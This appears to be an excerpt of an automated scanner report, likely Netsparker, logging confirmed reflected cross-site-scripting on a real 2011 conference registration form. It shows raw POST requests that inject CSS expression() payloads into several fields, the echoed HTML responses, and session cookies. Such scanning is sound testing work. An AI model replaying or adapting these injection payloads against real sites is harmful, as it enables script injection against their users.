--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="categoryid"

-1
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="language"

eng
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="reference"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="eb"

" stYle="x:expre/**/ssion(netsparker(9))
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="admin"

-1
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="bridgeid"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="discountcode"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="catpassword[65419]"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="catpassword[65420]"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="catpassword[65413]"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="catpassword[65411]"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="catpassword[65421]"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="selectcategoryid"

65407
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="catpassword[65407]"

3
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="x"

0
--91f65ef9496b45d3ab6f5a38e0bbdd1b
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--91f65ef9496b45d3ab6f5a38e0bbdd1b--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:25:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST " stYle="x:expre/**/ssion(alert(9))
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=7d2fc281952b4b508cbaac54e58687f1
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=giel3cuqdlsjta1b75fm6uii83
Content-Length: 1819
Accept-Encoding: gzip, deflate

--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="action"

preload_category
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="eventid"

19301
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="categoryid"

-1
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="language"

eng
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="reference"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="eb"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="admin"

" stYle="x:expre/**/ssion(netsparker(9))
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="bridgeid"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="discountcode"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="catpassword[65419]"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="catpassword[65420]"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="catpassword[65413]"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="catpassword[65411]"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="catpassword[65421]"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="selectcategoryid"

65407
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="catpassword[65407]"

3
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="x"

0
--7d2fc281952b4b508cbaac54e58687f1
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--7d2fc281952b4b508cbaac54e58687f1--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:26:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3410
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST " stYle="x:expre/**/ssion(alert(9))
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=35de415313504ffc8bb73fbd50b84fbf
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=giel3cuqdlsjta1b75fm6uii83
Content-Length: 1820
Accept-Encoding: gzip, deflate

--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="action"

preload_category
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="eventid"

19301
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="categoryid"

-1
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="language"

eng
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="reference"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="eb"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="admin"

-1
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="bridgeid"

" stYle="x:expre/**/ssion(netsparker(9))
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="discountcode"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="catpassword[65419]"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="catpassword[65420]"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="catpassword[65413]"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="catpassword[65411]"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="catpassword[65421]"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="selectcategoryid"

65407
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="catpassword[65407]"

3
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="x"

0
--35de415313504ffc8bb73fbd50b84fbf
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--35de415313504ffc8bb73fbd50b84fbf--

Response

